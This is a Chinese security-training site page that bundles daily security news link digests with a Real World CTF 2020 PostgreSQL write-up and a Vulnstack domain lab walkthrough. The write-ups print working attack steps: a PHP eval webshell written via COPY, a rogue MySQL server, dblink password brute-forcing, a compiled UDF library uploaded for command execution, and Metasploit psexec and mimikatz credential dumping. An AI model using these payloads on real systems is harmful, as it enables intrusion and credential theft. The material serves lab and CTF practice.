网络安全日报 2021年01月13日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、SAP修补严重的代码注入和DoS漏洞 https://www.securityweek.com/sap-patches-serious-code-injection-dos-vulnerabilities 2、微软星期二补丁修复83个漏洞 https://www.securityweek.com/microsoft-patch-tuesday-83-vulnerabilities-10-critical-1-actively-exploited 3、德国警方捣毁了世界最大的暗网市场DarkMarket https://securityaffairs.co/wordpress/113332/deep-web/dark-web-darkmarket-seized.html 4、EMA:某些辉瑞/ BioNTech COVID-19疫苗数据已在线泄露 https://securityaffairs.co/wordpress/113326/data-breach/ema-data-breach.html 5、Adobe修复了7个严重漏洞和阻止Flash内容加载 https://threatpost.com/adobe-critical-flaws-flash-player/162958/ 6、SolarWinds供应链攻击中涉及的第三种恶意软件Sunspot https://securityaffairs.co/wordpress/113316/malware/sunspot-solarwinds-attack.html 7、研究人员发现针对哥伦比亚的Spalax行动 https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/ 8、研究人员发现利用Windows和Android零日漏洞的复杂黑客活动 https://securityaffairs.co/wordpress/113342/hacking/project-zero-watering-hole-attack.html 9、英特尔在芯片级增加了勒索软件检测功能 https://www.zdnet.com/article/ces-2021-intel-adds-ransomware-detection-capabilities-at-the-silicon-level 10、被盗Mimecast证书在Microsoft电子邮件供应链攻击中被利用 https://threatpost.com/mimecast-certificate-microsoft-supply-chain-attack/162965/
Real World CTF 2020 DBaaSadge Writeup
昨天刚打的RWCTF比赛,觉得题目是非常不错的,至少这个环境下,postgre是大部分Web选手的弱项,圈内也没有什么自动化测试工具,因此写这篇WP还是有必要的。 由于大部分关键的技术点是我队里的亲姐们——鱼先做了,所以这里先贴一下人家的博客里的wp(鱼哥看到记得来拍我) https://f1sh.site/2021/01/11/real-world-ctf-2020-dbaasadge-writeup/#more-426 这道题学到的不止有postgre的知识,还有burpsuite BApp,以及md5crack的部分,这里还是给各位同学做个分析总结吧。 本文涉及知识点实操练习:https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182014112610341500001  (通过该实验掌握burp的配置方法和相关模块的使用方法,对一个虚拟网站使用burp进行暴力破解来使网站建设者从攻击者的角度去分析和避免问题,以此加强网站安全。) 复现环境下载 链接:https://pan.baidu.com/s/1TKQ5UYh55KcYQVQKG-CAwA 提取码:kwck 复制这段内容后打开百度网盘手机App,操作更方便哦--来自百度网盘超级会员V3的分享 源码分析 打开题目直接显示源码 <?php error_reporting(0); if(!$sql=(string)$_GET["sql"]){ show_source(__FILE__); die(); } header('Content-Type: text/plain'); if(strlen($sql)>100){ die('That query is too long ;_;'); } if(!pg_pconnect('dbname=postgres user=realuser')){ die('DB gone ;_;'); } if($query = pg_query($sql)){ print_r(pg_fe 这个源码不难理解,主要就是你通过get输入一个sql参数,然后他会把你输入的直接作为pg_query的参数,然后返回结果,如果运行正确就打印结果,错误就显示颜文字。其中sql输入限制了100个字节。 第一步我们必须自己搭建一个环境,这样可以把报错打出来,方便调试 进入postgre交互式命令行的方式是 psql 如果你在这步就报错了,请切换到postgres用户再做 pg_query的报错函数为: print_r(pg_fetch_all($query)); 因此我们在最后一个else里面加上这个函数 这样只要我们输入错误,显示的就是具体语句查询时候的报错。 接下来我们首先看看这个postgre的版本和用户 这一块很重要,虽然dockerfile里面有,但是如果以后其他题目没有给docker的时候,可以通过这两条语句来查询出题目postgre的版本 select user; select version(); 根据docker我们可以知道,这个realuser不是一个superuser,如果是superuser的话,网络上很多方式都可以直接getshell了。而nosuperuser在目前是无法getshell的,所以目标十分明确,就是要提权,然后正常的执行getshell命令。 当时查完,我们队伍就感觉可能是不是10.15之前修补的那个cve的绕过,但是研究发现那个cve是个pwn,而且题目明确表示这个是个web题目,所以放弃走这条路 接着我们在题目给的dockerfile里面看到他安装了两个扩展 在文档里面,CREATE EXTENSION表示的意思是安装postgre扩展 其中postgresql中dblink扩展的功能是可以在一个数据库中操作另外一个远程数据库 select dblink_connect('连接句柄名', 'host=XXX.XXX.XXX.XXX port=XX dbname=postgres user=myname password=mypassword'); 而mysql_fdw扩展则是用来在Postgre中快速访问MySQL中的数据,也就是给Postgre提供一个外界Mysql的访问方式 于是我们亲爱的鱼就想到了rouge-mysql 这个考点在CTF中比较常见,通过让题目连接自己的mysql恶意服务器来进行任意文件读取(我怎么就没想到) 从这里下载到脚本 https://github.com/allyshka/Rogue-MySql-Server 有两个版本,py版本和php版本,这里推荐php版本 py版本为什么不好原因有3: 1. 后台监听且不回显 (你说你监听就监听吧,还弄了个后台监听,运行完没有回显,搞半天以为我运行出错) 2. 结果在同目录下的一个mysql.log文件里,差点没找到。 3. 每次读取还得自己改一下源码里面的文件名 php版本就很人性,动态输入文件名,然后直接回显在屏幕上。 postgre的mysql_fdw使用方法可以参考这个网站,上面有实际例子: https://blog.csdn.net/bingluo8787/article/details/100958098 我们不用创建那么大的表格,随便填一个id int就行 CREATE SERVER mysql_server FOREIGN DATA WRAPPER mysql_fdw OPTIONS(host'ip',port'3306'); CREATE USER MAPPING FOR realuser SERVER mysql_server OPTIONS (username 'root', password 'root'); CREATE FOREIGN TABLE test(id int) SERVER mysql_server OPTIONS (dbname 'a', table_name 'test'); select * from test; 最后一个drop是因为如果前后两次使用相同的Servername,他就会一直报servername存在,类似mysql里面的databases会一直报存在一个样,因此我们每次运行完都drop掉,省的一直改 最后读取的poc如下: import requests import hashlib import random import uuid url ="http://54.219.197.26:60080/?sql=" #填你的IP ip="***" port="***" server_name="aaaa" dbname=server_name Table_name=server_name poc1="CREATE SERVER "+server_name+" FOREIGN DATA WRAPPER mysql_fdw OPTIONS(host'"+ip+"',port'"+port+"');" #poc2里填写你 在我们服务器上php mysql.php进行监听,然后运行poc,远程读取到服务器文件 那么问题来了,题目给了dockerfile,读取也没用啊,没有啥文件是不知道的。 这个时候我和鱼哥做题水平分水岭就出来了,确实不如人家厉害 我的想法 寻找conf文件配置中的漏洞,看能不能免密码登录superuser的账户,在UNIX平台中安装PostgreSQL之后,PostgreSQL会在UNIX系统中创建一个名为"postgres"当用户。PostgreSQL的默认用户名和数据库也是"postgres",而且这个是个superuser 但是我们出题人很贴心的在每次docker重启时都将postgres的密码改为了5位随机字符串。 但是通过网络查阅我了解到,在pg_hba.conf中如果把host配置为trust是可以进行免密登录的,然后在docker里面遍历搜索pg_hba.conf这个文件的位置,发现在/etc/postgresql/10/main下,读取以后: 这个很明显是不能够登录的,到了这里我就开始想爆破密码了 爆破的poc为 http://ip/?sql=SELECT%20dblink_connect(%27hostaddr=127.0.0.1%20port=5432%20dbname=postgres%20%20user=postgres%20password=aaaaa%27); 如果成功连接那么网页会回显 Array ( [0] => Array ( [dblink_connect] => OK ) ) 错误则是回显颜文字 爆破的时候用的是burpsuite的Turbo intruder Turbo 介绍 和普通的intruder不同,这个速度差不多是原来旧版本的10倍 我相信很多人还是在使用intruder(还是换了吧,那个确实慢) 每一个burp都自带一个Entender标签,里面都有一个BAppStore,是有很多插件可以安装的,之后再出一篇专门讲这些插件的吧,这次用的Turbo也在这里面,直接点击安装就好 当然,由于各种原因,很多人的版本直接点击install是长时间没有响应的,因为连不上国外服务器,所以这里我再给大家一个下载插件安装包的网址 https://portswigger.net/bappstore 这个网址可以下载到列表里面最新的插件,所有安装包都是.bapp结尾,然后点击刚才burp页面里面的Manual install进行附件安装也可以 主要用法如下,截取到包以后,右键有一个send to Turbo intruder按钮,比较隐蔽,注意看一下就好 然后爆破的时候需要在框里面填一下py的功能函数 如果对单个密码进爆破,则使用网络上爆破验证码的方式即可,把下面的复制到框内(脚本都是现成的,网络上一搜一堆): from itertools import product def brute_veify_code(target, engine, length): pattern = '1234567890abcdefghijklmnopqrstuvwxyz' for i in list(product(pattern, repeat=length)): code = ''.join(i) engine.queue(target.req, code) def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.e 然后在url里面需要爆破的位置用%s表示 这个速度是真的很快的,一秒大概4000多个 如果是简单的爆破,他要快很多,但是事实证明,大型爆破时,个人电脑撑不住。 然后这题6千万个密码,就把我电脑内存和带宽跑炸了...... 鱼哥的做法 怎么说人家就是很聪明,直接想到类比mysql,mysql里面的密码存储方式是落地的,就在data_directory变量的目录位置,那么同样的,进到docker里面通过查询一下系统变量,就可以看到postgre的密码存放位置 这里说一下postgre的交互式命令行 进入postgre的交互式命令行的命令为 psql 你也可以用 psql -c "commond" 来直接执行命令,和mysql一样 但是如果你是root用户,且没有配置过,是不可以在root下直接进入psql的,会出现如下错误: 所以我们要切换到postgres用户 然后我们查询系统变量 这里讲一下psql的退出方式,你要觉得麻烦,直接ctrl+d强制退出就好 然后我们进入目录下,发现一堆文件 如何寻找密码文件呢,前面看了conf文件为md5加密 这里教大家一个方便查找文件内容的命令egrep egrep -r "内容" 目录 其中内容部分支持正则表达式 最后发现在global/1260里面 提供一个爆破md5的工具,这个是真的很快: http://c3rb3r.openwall.net/mdcrack 爆破方式参考 http://www.91ri.org/1285.html 很快啊,他就直接出来了,前面5位就是密码,后面的是用户名 还记得dblink扩展的作用吗,用来连接postgre数据库。 然后我们就可以用dblink直接登录superuser了 所以剩下的问题就是用superuser执行命令的问题了 只要能够执行下面这句话,就可以把木马写入到目录里面,如果web目录不是777,那么写一个udf到/tmp也可以。 SELECT * FROM dblink('hostaddr=127.0.0.1 user=postgres password=aaaaa', 'COPY (select $<?=@eval($_REQUEST[1]);?>$) to $/var/www/html/1.php$;') as t1(record text); 但是问题又来了,他每次连接都是一个新的,无法保持上一次连接状态,因为不是命令行交互,所以我们必须要在一行里面打完所有poc,但是他限制了100个字节,这个很头疼,我和鱼哥都开始想着怎么绕过这个长度限制。 然后还是一个队内做题的分水岭,高手鱼和普通ctfer小s的区别。 我的想法 由于之前写过mysql 的存储过程,很清楚只要是数据库,都可以把一个复杂的语句经过编码然后存入到一个存储过程里面,然后下一次调用,这样就可以避免两次连接不保持状态这个问题。 没有概念的同学请参考强网杯线上随便注正解,或者参考我前一篇发在蚁景的文章再学一下。 于是我实验了postgre的存储过程,也很快,因为这个确实熟悉 只要发送如图上两次请求就可以调用d函数中的select语句 但是我还是想简单了,因为存储过程在命令行中是可以分开写的,就算是两次连接一样可以写完,但是url里面他的回车符传入到postgre后端不识别,因此他不能分开写,所以还是绕不过去100个字符的限制。因此这个方法不通。 但是不是说这个方法没用,如果这里考察的不是postgre长度限制而是敏感字符过滤,那么肯定是要用存储过程的。(最后的尊严TT) 鱼哥的想法 鱼哥想到的是子查询,通过将poc语句写入到自己mysql服务器的一个表里面,然后在利用mysql_fdw扩展远程连接mysql服务器的时候select出来。 可以将 SELECT * FROM dblink('hostaddr=127.0.0.1 user=postgres password=aaaaa', 'COPY (select $<?=@eval($_REQUEST[1]);?>$) to $/var/www/html/1.php$;') as t1(record text); 变形为 SELECT * FROM dblink((select a from c where b=1), (select a from c where b=2)) as t1(a text); 第一个select做连接,第二个做执行命令。 调整poc如下,调整了子查询的表名为b和列名为s,m,然后换了servername为a66_server,t9为子查询别名: poc1="CREATE SERVER a66_server FOREIGN DATA WRAPPER mysql_fdw OPTIONS(host'IP',port'3306');" poc2="CREATE USER MAPPING FOR realuser SERVER a66_server OPTIONS (username 'root', password 'root');" poc3="CREATE FOREIGN TABLE a66(s text,m text) SERVER a66_server OPTIONS (dbname 'b', table_name 'b');" po 先在自己服务器建立一个b数据库,然后建立一个b表,里面是s字段和m字段,然后两个字段分别存放两个poc,一个用来连接,一个用来执行 坑点又来了! 这个地方一定一定不能因为想弄长一点,就用longtext或者其他text类型来声明这两个字段,因为当postgre从mysql查询的时候会报如下错误: 具体原因尚未分析。 varchar的最长长度是65535,但是由于每个人电脑的不同,可能最大长度设置也不同,我这里最多只能设置45000。 要写入mysql的poc drop table b; create table b(s varchar(20000),m varchar(44000)); insert into b (s,m) value('hostaddr=127.0.0.1 user=postgres password=*****','COPY (select $<?=@eval($_REQUEST[3]);?>$) to $/tmp/smity.php$;'); 弄好以后差不多如下 然后poc: import requests import random import uuid url ="http://IP/?sql=" poc1="CREATE SERVER a66_server FOREIGN DATA WRAPPER mysql_fdw OPTIONS(host'ip',port'3306');" poc2="CREATE USER MAPPING FOR realuser SERVER a66_server OPTIONS (username 'root', password 'root');" poc3="CREATE FOREIGN TABLE a66(s text,m 然后对面的/tmp目录就写了个文件 这里题目没有777权限给/var/www/html。所以我们要考虑/tmp下写udf来执行命令 这个是固定的用法了 参考 https://blog.csdn.net/qq_33020901/article/details/79032774 这篇文章请直接看最后一个部分,因为前面利用环境编译的部分我觉得太过麻烦,直接用github上的源码编译即可 大致过程如下: 按照题目postgre的大版本编一个符合版本的.so 将.so文件分片,写入到sql语句里,就和之前写php文件一样,再写到自己的mysql数据库里 发送poc让对面服务器来我们这里查询出来语句并且执行 udf.so编译过程 先去这个网页下载编译程序 https://github.com/sqlmapproject/udfhack/tree/master/linux/64/lib_postgresqludf_sys 然后进入题目docker 先安装一个postgre-server-dev,不然很多头文件没有。 apt install postgresql-server-dev-all 然后在下载的Makefile里面,加一段10版本的编译,直接复制下面的,然后修改一下第一句的目录,如果你的目录不对,就去/usr/里面看一下到底是多少,只需要找到/usr里面的postgre目录即可,不需要管server存不存在,他会自动创建的。 然后将下载的复制到docker里面 make 10 就编译好了,在同目录下就会发现生成了一个lib_postgresqludf_sys.so 报错不用管他 这个就是我们需要的udf.so 然后是分片 因为在postgresql高版本处理中,如果块之间小于2048,默认会用0去填充让块达到2048字节,会导致文件破坏或者上传失败 用python脚本去分割udf.so文件 Python #~/usr/bin/env python 2.7 #-*- coding:utf-8 -*- import sys if __name__ == "__main__": if len(sys.argv) != 2: print "Usage:python " + sys.argv[0] + "inputfile" sys.exit() fileobj = open(sys.argv[1],'rb') i = 0 for b in fileobj.read(): sys.stdout.write(r'{:02x}'.format(ord(b))) i = i + 1 if i % 2048 = 会出来6个大块,分为6条语句,和参考网页里的一样 https://blog.csdn.net/qq_33020901/article/details/79032774 SELECT lo_create(9023); insert into pg_largeobject values (9023, 0, decode('...'); insert into pg_largeobject values (9023, 1, decode('...'); insert into pg_largeobject values (9023, 2, decode('...'); insert into pg_largeobject values (9023, 实验证明,设置varchar(44000)是绝对够写入mysql数据库的。不用担心长度问题 然后删除原来的表,重新添加 drop table b; create table b(s varchar(20000),m varchar(44000)); insert into b (s,m) value('hostaddr=127.0.0.1 user=postgres password=25j53',"SELECT lo_create(9023);insert into...... 然后运行刚才的poc,写入/tmp/testeval.so 写入so以后,我们需要执行以下sql语句来执行命令 CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/testeval.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE; select sys_eval('id'); 原来的参考网站有一条 drop function sys_eval; 应该是写错了,加了这个不能运行 再次清空我们服务器上的mysql数据表,重新建立 drop table b; create table b(s varchar(20000),m varchar(44000)); insert into b (s,m) value('hostaddr=127.0.0.1 user=postgres password=25j53',"CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/testeval.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;select sys_eval('/rea 然后再次运行poc,得到flag 总结 队内这次打web的高手挺多,还有其他做法,鱼哥也发他博客了,感兴趣可以看看 https://f1sh.site/2021/01/11/real-world-ctf-2020-dbaasadge-writeup/#more-426 总的来说。这次的rw web题目是很好的,其中java和postgre都是目前ctf环境的弱项,一考一个准,还是得有空补一补php以外的东西。
Web渗透实战:使用burp进行暴力破解
通过该实验掌握burp的配置方法和相关模块的使用方法,对一个虚拟网站使用burp进行暴力破解来使网站建设者从攻击者的角度去分析和避免问题,以此加强网站安全。 本文涉及知识点实操练习:https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182014112610341500001 实验简介 实验所属系列:web安全 实验对象:本科/专科信息安全专业 相关课程及专业:网络安全,计算机网络 实验类别:实践实验类 1.Burp的工作模式: 在没有burp之前,客户端使用浏览器直接与服务器进行通信。有了burp之后,burp在客户端与服务器之间充当代理。这样,浏览器发送给服务器的请求就会被burp进行捕获,而burp和wireshark这种审计类工具相比,其强大之处在于不仅可以做审计工作,更可以对数据包进行修改并发送出去。使用了burp的结构如下图所示。 2.暴力破解: 一般使用暴力破解都有两种原因: 1.对这个漏洞的测试,人是可以完成的,即可穷举。 2.人可以完成,但是代价太大,或者太浪费时间。 正是出于这样的问题,一些软件的出现帮助人完成了这些测试,这就是暴力破解的真正好处。在业界曾经有这样的一种看法,对于暴力破解的使用都不屑一顾,因为大家觉得技术含量太低。但是,从实际的情况来看,因为用户使用弱口令情况太普遍,导致很多漏洞使用暴力破解都可以轻松拿下。 暴力破解,最有价值的地方是在对字典的构造上,这是一门技术,需要长期的经验积累。 实验目的 通过该实验掌握burp的配置方法和相关模块的使用方法,对一个虚拟网站使用burp进行暴力破解来使网站建设者从攻击者的角度去分析和避免问题,以此加强网站安全。在此郑重声明,本教程只做教学目的,严禁使用本教程对线上网站进行破坏攻击。 实验环境 服务器:windows xp sp3  ip地址:10.1.1.163 测试者:windows xp sp3  ip地址随机
网络安全日报 2021年01月12日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、联合国环境规划署泄露了100,000条员工记录 https://www.securityweek.com/united-nations-environment-programme-exposed-100000-employee-records 2、卡巴斯基将SolarWinds攻击代码与俄罗斯知名APT集团关联 https://www.securityweek.com/malware-used-solarwinds-attack-linked-backdoor-attributed-turla-cyberspies 3、SocialArks泄露来自Facebook,Instagram和LinkedIn的3.18亿条记录 https://threatpost.com/social-profiles-leaked-chinese-data-scrapers/162936/ 4、Typeform修复了Zendesk Sell form数据劫持漏洞 https://www.bleepingcomputer.com/news/security/typeform-fixes-zendesk-sell-form-data-hijacking-vulnerability 5、Bitdefender发布了Darkside勒索软件免费解密器 https://www.zdnet.com/article/free-decrypter-released-for-victims-of-darkside-ransomware/ 6、70TB Parler用户数据遭泄露 https://cybernews.com/news/70tb-of-parler-users-messages-videos-and-posts-leaked-by-security-researchers 7、Ubiquiti Networks披露数据泄露 https://securityaffairs.co/wordpress/113296/data-breach/ubiquiti-discloses-data-breach.html 8、针对Qiui Cellmate设备的ChastityLock勒索软件源代码已在线泄漏 https://securityaffairs.co/wordpress/113251/hacking/qiui-cellmate-ransomware.html 9、勒索软件团伙优先针对高管以迫使公司付款 https://www.zdnet.com/article/some-ransomware-gangs-are-going-after-top-execs-to-pressure-companies-into-paying/ 10、xHunt活动使用BumbleBee webshell横向移动 https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/
网络安全日报 2021年01月11日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、新西兰中央银行遭受网络攻击 https://www.securityweek.com/new-zealand-central-bank-hit-cyber-attack 2、美国国务院批准成立网络空间安全和新兴技术局 https://www.securityweek.com/us-department-state-approves-new-cyberspace-security-bureau 3、TeamTNT僵尸网络窃取Docker API和AWS凭证 https://securityaffairs.co/wordpress/113228/malware/teamtnt-botnet-docker-aws.html 4、达索猎鹰喷气机公司被Ragnar Locker勒索软件攻击 https://securityaffairs.co/wordpress/113216/data-breach/dassault-falcon-data-breach.html 5、Twitter已永久封禁特朗普的帐户 https://securityaffairs.co/wordpress/113197/social-networks/twitter-donald-trump-account-suspended.html 6、NVIDIA发布了高危安全漏洞补丁 https://www.securityweek.com/nvidia-ships-patches-high-severity-security-flaws 7、新攻击可克隆Google Titan 2FA安全密钥 https://thehackernews.com/2021/01/new-attack-could-let-hackers-clone-your.html 8、沃达丰旗下公司ho.Mobile宣布数据泄露 https://www.bleepingcomputer.com/news/security/vodafones-ho-mobile-admits-data-breach-25m-users-impacted/ 9、研究人员在罗克韦尔产品中发现DoS漏洞 https://www.securityweek.com/dos-vulnerabilities-found-rockwells-factorytalk-linx-and-rslinx-classic-products 10、Ryuk勒索软件操控者已获利1.5亿美元 https://www.infosecurity-magazine.com/news/ryuk-ransomware-attackers-have/
Vulnstack 3 域环境靶机实战
环境搭建 将环境从http://vulnstack.qiyuanxuetang.net/vuln/detail/5/上下载下来,只需要添加相应的一个VMNET2的网卡,且IP段为192.168.93.0/24 需要进入centos重启一下网卡,至少我是这么做的才找到IP。 本文涉及知识点实操练习:https://www.yijinglab.com/expc.do?ec=ECID2026-aeda-4f39-89ed-c6444fa2bfa2  (本节课主要讲解Vulnhub渗透测试实战靶场关于Joomla CMS的综合渗透练习,通过该实验学习渗透测试的信息收集、漏洞扫描与利用、权限提升,最终获取/root下的flag。) 拓扑图  WEB入口 主机发现 nmap -sn 192.168.124.0/24  端口 nmap -sS 192.168.124.16  收集到3个端口,暂不做全部扫描。那就先看下网站首页,如下。  web站点 是一个joomla的web页面,顺手一个administrator放在url后面,看到后台,看到后台,看到后台。我还是比较乐观的人,总想去尝试尝试一两个弱口令。现实总会给我一记响亮的耳光,失败告终。  只好掏出dirsearch,然后扫描下目录:  这是以php~结尾的后缀名,应该不会被当成php执行,所以,  这个时候,就可以连接数据库了,那就找密码进后台。  难道还是想我爆破?如果让我爆破,那这必然是个弱口令。先去网上子弹(字典),掏出大菠萝(john)就是一顿扫。子弹打完了,发现敌人丝毫不动,那,那宣告失败吧。都说失败是成功的爹。接着换思路,就是在本地搭建一个一模一样的。然后将自己mysql里的password字段复制到目标数据库中去或者添加一个新用户,太懒是原罪。然后,在网上找到直接添加到数据库的方法,在https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn  改成目标机器上的表名就可以了: INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2', 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW()); INSERT INTO `am2zu_user_usergroup_map` (`user_id`,  虽然密码格式不一样,但是依然能进后台。  在模板处可以修改网站源代码:Extensions-->Templates,在index.php中插入一句话,保存。   该亮出尚方宝剑——蚁剑了,致命一击进入内网了。然后就翻车了  这,,,原来是被禁用了危险函数,虽然不能执行命令,但是能看到php版本,是php7的。然后发现蚁剑有专门的绕过disable_function的插件,姿势不错,有点狐气。然后针对php7的绕过挨个挨个试。  绕过了会弹出一个新的交互式shell界面  内网渗透 权限太低,是个www-data的权限。相信经过一番努力使用各种姿势提权,总会绝望的。那就只能是自己没有做好信息收集,找:定时任务、/home、/etc/passwd、网站根目录、/tmp目录。最后在/tmp/mysql/test.txt中看到用户名密码  但是并没有在本机器上发现这个 wwwuser 的用户。索性尝试下,又不犯罪。  竟然成功了?猜测应该做了转发将http请求转到内网的主机上,有内网就可以继续渗透。  而使用ssh连接的主机的网卡,有三个,一个连接外网,一个连接内网。  然后接着提权这台外网的主机,很顺利,看样子是有备而来。看了下内核为2.6.32 并且是centos的操作系统,直接使用脏牛提权成功。   获取一个msf会话,接着渗透。  后渗透 添加路由 meterpreter > run get_local_subnets meterpreter > run autoroute -s 192.168.93.0/255.255.255.0  探测内网主机的存活 # 针对windows use auxiliary/scanner/smb/smb_version # linux use auxiliary/scanner/discovery/arp_sweep 用这个没有探测出windows主机 最终所有主机如下  三个windows,两个使用ms17-010,未果。都没能得到会话。  啊,这....。最后借鉴了下别人的方法,原来是爆破。字典不够强大,最后还是将密码添加到字典中去了(无可奈何)。假如说我爆破出来了 use auxiliary/scanner/smb/smb_login set SMBUSER administrator set PASS_FILE /root/桌面/passlist  获取会话。目前的情况是windows在内网,添加的路由是把攻击机带入到内网,使用reverse_tcp是连接不上了,只能正向连接。 use exploit/windows/smb/psexec set payload windows/x64/meterpreter/bind_tcp set rhosts 192.168.93.30 set smbuser administrator set smbpass 123qwe!ASD 然后拿到两个会话,这个exploit需要多尝试几次,才行。  查看是否在域环境 meterpreter > sysinfo   sysinfo" src="headImg.action?news=b44d60ec-bd7d-4839-acf1-004953f9a34e.png" width="848" height="99" 拿下域控 在server2008上发现域控登录后的记录,然后使用 mimikatz 获取到明文域控密码。 load mimikatz mimikatz_command -f privilege::debug mimikatz_command -f sekurlsa::logonPasswords  得到域管理员账号密码。由于密码的特殊性,尝试使用wmiexec.py一直没成功,两个!!在linux是特殊符号,表示重新执行上一条命令。然后通过下面方法拿到shell 当前用户为   远程连接 run post/windows/manage/enable_rdp proxychains rdesktop 192.168.93.20
网络安全日报 2021年01月08日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Nvidia警告Windows游戏玩家注意驱动高危漏洞 https://threatpost.com/nvidia-windows-gamers-graphics-driver-flaws/162857/ 2、新勒索软件Babuk Locker瞄准大公司 https://threatpost.com/ransomware-babuk-locker-large-corporations/162836/ 3、日产北美公司因Git服务器配置错误泄露源代码 https://www.zdnet.com/article/nissan-source-code-leaked-online-after-git-repo-misconfiguration/ 4、红帽收购容器安全公司StackRox https://www.securityweek.com/red-hat-buys-container-security-firm-stackrox 5、安全研究人员发现Ezuri内存加载器在Linux攻击中被利用 https://www.securityweek.com/ezuri-memory-loader-abused-linux-attacks 6、Fortinet WAF中发现严重漏洞可能使公司网络受到攻击 https://www.securityweek.com/vulnerabilities-fortinet-waf-can-expose-corporate-networks-attacks 7、与朝鲜相关的APT37通过RokRat Trojan攻击韩国 https://securityaffairs.co/wordpress/113134/malware/apt37-rokrat-trojan.html 8、美国政府将与HackerOne合作启动“ Hack the Army 3.0”漏洞赏金计划 https://securityaffairs.co/wordpress/113116/security/hack-the-army-3-0.html 9、Mozilla Firefox禁用退格键以防止数据丢失 https://www.bleepingcomputer.com/news/software/mozilla-firefox-disabling-backspace-key-to-prevent-data-loss 10、Chrome 87 更新修复数十个高危漏洞 https://www.securityweek.com/google-pays-out-over-100000-vulnerabilities-patched-chrome-87-update
网络安全日报 2021年01月07日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Earth Wendigo通过JavaScript后门窃取电子邮件 https://www.securityweek.com/earth-wendigo-hackers-exfiltrate-emails-through-javascript-backdoor 2、新加坡承认警方可以访问Covid-19追踪APP数据 https://www.securityweek.com/singapore-admits-police-can-access-contact-tracing-data 3、SoftMaker Office漏洞允许通过恶意文档执行代码 https://www.securityweek.com/softmaker-office-vulnerabilities-allow-code-execution-malicious-documents 4、安全研究人员发现针对企业网络的全新勒索软件家族Babuk https://www.securityweek.com/researchers-warn-new-ransomware-targeting-enterprise-networks 5、SolarWinds供应链攻击访问了美国司法部3%的邮箱 https://securityaffairs.co/wordpress/113108/data-breach/solarwinds-hackers-o365-mailboxes.html 6、WhatsApp将与Facebook及其公司共享用户数据 https://securityaffairs.co/wordpress/113094/digital-id/whatsapp-shares-data-facebook.html 7、钓鱼邮件使用假的特朗普性丑闻视频传播QNode恶意软件 https://thehackernews.com/2021/01/hackers-using-fake-trumps-scandal-video.html 8、研究人员发现黑客利用严重的Zyxel漏洞攻击 https://threatpost.com/cybercriminals-exploits-zyxel-flaw/162789/ 9、黑客组织Thallium针对股票投资者进行供应链攻击 https://www.bleepingcomputer.com/news/security/north-korean-software-supply-chain-attack-targets-stock-investors/ 10、印度数千名患者的COVID-19实验室测试结果泄漏 https://www.bleepingcomputer.com/news/security/indian-government-sites-leaking-patient-covid-19-test-results/
网络安全日报 2021年01月06日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、美安全机构发表联合声明将SolarWinds供应链攻击归咎于俄罗斯 https://securityaffairs.co/wordpress/113071/hacking/us-blames-russia-solarwinds-hack.html 2、加密货币用户遭ElectroRAT大规模攻击 https://securityaffairs.co/wordpress/113064/malware/electrorat-campaign.html 3、自11月以来针对医疗保健行业的网络攻击增加了45% https://securityaffairs.co/wordpress/113038/hacking/healthcare-industry-attacks.html 4、数据安全提供商Netwrix和Stealthbits合并 https://www.securityweek.com/data-security-providers-netwrix-and-stealthbits-merge 5、Citrix发布更新,修复被用来发起反射DDoS攻击的缺陷 https://www.securityweek.com/citrix-releases-updates-prevent-ddos-attacks-abusing-its-appliances 6、Zyxel产品存在后门账号影响数十万用户 https://www.securityweek.com/hackers-start-exploiting-recently-disclosed-zyxel-vulnerability 7、Google发布Android安全更新解决了43个漏洞 https://threatpost.com/google-warns-of-critical-android-remote-code-execution-bug/162756/ 8、Telegram查看附近的人功能可对他人进行三角定位 https://threatpost.com/telegram-triangulation-users-locations/162762/ 9、亚马逊合作伙伴Juspay泄露3500万印度信用卡持有人的数据 https://threatpost.com/data-from-august-breach-of-amazon-partner-juspay-dumped-online/162740/ 10、新恶意软件使用WiFi BSSID进行地理定位 